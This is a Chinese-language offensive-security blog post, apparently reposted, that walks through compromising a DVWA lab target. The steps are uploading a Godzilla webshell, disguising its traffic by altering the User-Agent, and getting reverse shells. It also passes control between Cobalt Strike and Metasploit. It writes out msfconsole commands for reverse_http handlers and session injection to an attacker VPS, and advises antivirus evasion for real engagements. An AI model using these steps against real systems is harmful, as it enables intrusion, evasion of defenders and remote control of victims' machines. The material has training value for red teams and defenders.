不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

webshell流量隐蔽&CS和MSF联动

环境:

Windows:  192.168.93.3
VPSx.x.x.x
⼯具:CobaltStrike4.1MSF、哥斯拉v2.92

实验场景DVWA靶场,通过靶场的上传漏洞位置,上传webshell

然后⽤冰蝎或者其他webshell⼯具连接:

冰蝎下载地址:

https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6

我这⾥⽤的上阶段⽐较⽕的哥斯拉,在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同⽬录下⽣成data.db数据库存放数据,同时它⽀持流量加密和修改特征,可以⼀定程度上防⽌被安服设备发现。同时可以⾃⽣成payload,

哥斯拉下载地址:⽬前最新的版本为V2.92

https://github.com/BeichenDream/Godzilla/releases/tag/v2.92-godzilla

个⼈感觉唯⼀缺点就是⻚⾯有点丑。

既然说了可以隐藏特征,那么这⾥我们就伪造⼀下特征:

⾸先wireshark抓包看下 未作修改的数据包是什么样⼦:

先⽣成⼀个payload:点击. ⻚⾯ — 管理 — ⽣成

webs hell有两种加密规则,Raw or Base64 加密

Raw:Raw是将加密后的数据直接发送或者输出
Base64:Base64是将加密后的数据再进⾏Base64编码

然后选择pass是连接密码,payload类型 ,⼀共是三种类型,

这⾥我的webshell⽂件是:1.php。

通过DVWA靶场上传到本地,然后链接shell ,⾥⾯参数⼀定要和我们创建的⼀样。

然后我们测试连接,成功后添加就⾏,

进⼊到操作模式,在命令执⾏处执⾏⼀条命令:dir,同时wireshark开启抓包

然后就是查看包内容:没更改之前是这样的

图片

这⾥⼀些安服设备都会过滤  User-agent(简称UA),所以我们这⾥要根据对⽅的⽹络环境去修改:

图片添加⽬标处也可以更改,再次抓包发现成功 UA成功修改了。

⾄此webshell⽅⾯基本就不需要我们再去配置什么了,如果为了保险起⻅可以在对webshell进⾏⼀定的隐蔽。

接下来就是CS、MSF上线。

这⾥他有⾃带的反弹shell⼯具 ;先尝试能否成功,打开我们的VPS 机的MSF 按照他的配置进⾏配置 ,然后 run 开始监听 10086端⼝观测 VPS动态,发现成功反弹shell。

这⾥ MSF已经上线,我们现在要让CS 也上线,

这⾥发现⼀个问题,脚本shell的权限很不稳,MSF权限经常会丢失,所以还是建议直接上传CS⻢或者通过其他⽅式上线CS。这⾥上传CS⻢⽅式,实战中注意免杀。

通过webshell⼯具的⽂件上传到本地机器⽬录。然后运⾏上线直接管理员权限,都省着我提权了,这⾥推荐⼏个提权CS插件:

https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/zer0yu/Awesome-CobaltStrike

尝试把CS会话在MSF端上线

当CobaltStrike获得了⼀个上线机器,想把这个⽬标传给Metasploit中的meterpreter,获得⼀个session进⾏控制。在Metasploit执⾏以下命令:

MSF:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http 
set lhost vps:IP
set lport 10010
exploit -j #-j 后台监听 可不选

CS:

⾸先有⼀个已经建⽴会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:10010

选择我们刚才建⽴的 listener ,然后等待MSF端,过程⼤概1-2分钟

MSF会话反弹给CS:

这⾥只是为了实验,所以就⽤这个CS反弹来的shell,实际中请结合具体内⽹情况。
CS适合外围突破,MSF适合内⽹横向,当然也看个⼈喜好

1、⾸先把msf上获取到的meterpreter挂在后台运⾏

Background  #就是返回的意思

CS :创建⼀个监听,payload⽅式要与MSF相同即可。

MSF:

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set disablepayloadhandler true
#默认情况下,payload_inject执⾏之后会在本地产⽣⼀个新的handler,由于我们已经有了⼀个,所以
不需要在产⽣⼀个,所以这⾥我们设置为true
set lhost x.x.x.x                     #cobaltstrike监听的ip
set lport 10001                       #cobaltstrike监听的端⼝
set session 1                         #这⾥是获得的session的idexploit

然后正常情况下 等待上线即可,我这⾥不做演示了,因为 VPS卡死了。。。

转自:ms08067

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » webshell流量隐蔽&CS和MSF联动

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏